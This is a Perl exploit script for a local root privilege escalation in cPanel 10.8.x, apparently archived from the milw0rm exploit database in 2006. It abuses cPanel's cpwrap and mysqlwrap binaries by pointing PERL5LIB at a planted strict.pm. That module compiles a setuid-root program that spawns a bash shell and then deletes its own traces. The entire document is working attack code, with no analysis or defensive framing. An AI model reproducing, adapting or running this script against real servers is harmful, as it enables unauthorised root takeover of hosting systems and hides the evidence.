1 #!/usr/bin/perl −w
2
3 # 10/01/06 − cPanel <= 10.8.x cpwrap root exploit via mysqladmin
4 # use strict; # haha oh wait..
5
6 my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
7 my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
8 my $pwd = ‘pwd‘;
9
10 chomp $pwd;
11 $ENV{’PERL5LIB’} = "$pwd";
12
13 if ( ! −x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
14 if ( ! −x "$cpwrap" ) { die "$cpwrap: $!\n"; }
15 if ( ! −x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }
16
17 open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
18 while(<CPWRAP>) {
19 if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
20 }
21 close (CPWRAP);
22
23 open (STRICT, ">strict.pm") or die "Can’t open strict.pm: $!\n";
24 print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
25 print STRICT "system(\"/bin/echo −n \\\"\$e\\\">Maildir.c\");\n";
26 print STRICT "system(\"/usr/bin/gcc Maildir.c −o Maildir\");\n";
27 print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
28 print STRICT "system(\"/bin/rm −f Maildir.c strict.pm\");\n";
29 close (STRICT);
30
31 system("$mysqlwrap DUMPMYSQL 2>/dev/null");
32
33 if ( −e "Maildir" ) {
34 system("./Maildir");
35 }
36 else {
37 unlink "strict.pm";
38 die "Failed\n";
39 }
40
41 # milw0rm.com [2006−10−01]
Page 1/1
cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit
Clint Torrez
10/01/2006